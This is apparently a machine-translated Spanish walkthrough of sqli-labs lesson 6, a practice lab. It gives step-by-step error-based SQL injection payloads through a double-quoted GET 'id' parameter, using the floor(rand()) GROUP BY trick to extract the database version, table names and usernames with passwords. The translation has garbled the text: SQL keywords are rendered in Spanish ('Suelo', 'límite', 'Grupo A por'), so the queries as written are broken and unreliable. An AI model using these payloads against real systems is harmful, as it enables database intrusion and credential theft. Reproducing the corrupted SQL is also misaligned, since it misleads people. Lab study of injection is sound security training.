Menos 6-GET - Doble inyección cotizaciones -Doble - Cadena
1.原页面
2.?id=1
3.?id=1
'' '1 \'' LIMIT 0,1' -> ' '' 1 \' 'LIMIT 0,1' -> '' 1 \ '' LIMIT 0,1 ->
SQL :
Seleccionar login_name, contraseña de administrador donde id = '' de entrada '' límite de 0,1;
4. base de datos Access
? Id = 0 "union select 1 , count (*), concat ((select concat (version (), 0x3a, 0x3a, la base de datos (), 0x3a, 0x3a, user (), 0x3a) límite de 0,1 ), Suelo (RAND (0) 2)) AS INFORMATION_SCHEMA.TABLES del Grupo A por + A-
(ver específicamente principio: HTTPS: //blog.csdn.net/qq_42630215/article/details/104700359)
5. La tabla de adquisición nombre
? lo anterior mencionado de id = 0 "de la Unión SELECT 1, COUNT ( ), concat ((el concat SELECT (nombre_tabla, 0x3a, 0x3a) del DONDE INFORMATION_SCHEMA.TABLES esquema_tabla = Base de datos () límite de 0, 1), Suelo (RAND (0) * 2 )) como un grupo de INFORMATION_SCHEMA.TABLES por un - +
Ver otras tablas, los valores límite se puede cambiar
6. Obtener información del usuario
? Id = 0 "union select 1 , count (*), concat ((select concat (nombre de usuario, 0x3a, 0x3a, password, 0x3a, 0x3a) de security.users limitan 1,1), suelos (rand (0) * 2)) como un grupo de INFORMATION_SCHEMA.TABLES por un - +
obtener información acerca de otro usuario, puede cambiar el valor límite
